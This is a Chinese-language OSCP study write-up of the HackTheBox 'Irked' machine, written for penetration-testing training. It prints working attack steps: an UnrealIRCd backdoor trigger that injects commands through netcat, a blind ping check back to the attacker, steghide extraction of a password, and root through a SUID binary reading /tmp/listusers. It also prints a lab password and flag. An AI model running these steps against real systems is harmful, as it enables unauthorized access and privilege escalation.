OSCP备考_0x12_HackThBox靶机_Linux_irked

Ethan医生7个月前靶场217

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.213.7 (扫描TCP)

image.png



nmap -sU --top-ports 100 10.129.213.7 (扫描UDP)


image.png



UnrealIRCd

    查看是否有后门漏洞

    nmap -p 6667,6697,8067,65534 --script irc-unrealircd-backdoor 10.129.213.7 

image.png



    echo -e "AB;id\n" | nc 10.129.213.7  8067

命令解释

  • echo -e "AB;id\n":生成一个字符串,其中 AB; 是触发后门的特殊前缀,id 是要执行的命令

  • |:管道符,将前一个命令的输出作为后一个命令的输入

  • nc 10.10.10.117 8067:使用 netcat 连接到目标 IP 的 8067 端口

没有回显,可能就是无法回显,尝试在没有回显的情况下验证漏洞

echo -e "AB; ping -c 1 10.10.16.26\n" | nc 10.10.10.117 8067

本地监听

tcpdump -ni tun0 icmp


image.png

image.png

到home底下有djmardov 没法直接查看user.txt

image.png

经过一连串搜索发现Documents底下有.backup挡案

cat .backup

Super elite steg backup pw

UPupDOWNdownLRlrBAbaSSss


image.png

steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss 

image.png

image.png

Kab6h+m+bbp2J:HG

image.png

提权发现suid有

/usr/bin/viewuser 可疑文件

image.png

发现没找到SH

echo sh > /tmp/listusers 直接写入

image.png




b52f698299c54635b5dae46a6f0efa5b

标签: OSCP

相关文章

OSCP备考_0x19_HackThBox靶机_Linux_haircut

OSCP备考_0x19_HackThBox靶机_Linux_haircut

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.82.246 (扫描TCP)        &n...

OSCP备考_0x23_Vulnhub靶机_digitalworld.local: TORMENT

OSCP备考_0x23_Vulnhub靶机_digitalworld.local: TORMENT

名称说明靶机下载链接https://www.vulnhub.com/entry/digitalworldlocal-torment,299/攻击机(kali)ip:192.168.233.168靶机(...

OSCP备考_0x53_HackThBox靶机_Windows_Active(AD域)

OSCP备考_0x53_HackThBox靶机_Windows_Active(AD域)

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.237.97 (扫描TCP)enum4linux(自动化枚举)   ...

OSCP备考_0x17_Vulnhub靶机_joy

OSCP备考_0x17_Vulnhub靶机_joy

名称说明靶机下载链接攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.233.184arp-scan 192.168.233.1/24nmap -p- 1...

OSCP备考_0x30_HackThBox靶机_Linux_Doctor

OSCP备考_0x30_HackThBox靶机_Linux_Doctor

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.7.227 (扫描TCP)nmap -sU --top-ports 100 10.129.7.22...

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

名称说明靶机下载链接https://www.vulnhub.com/entry/matrix-3,326/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。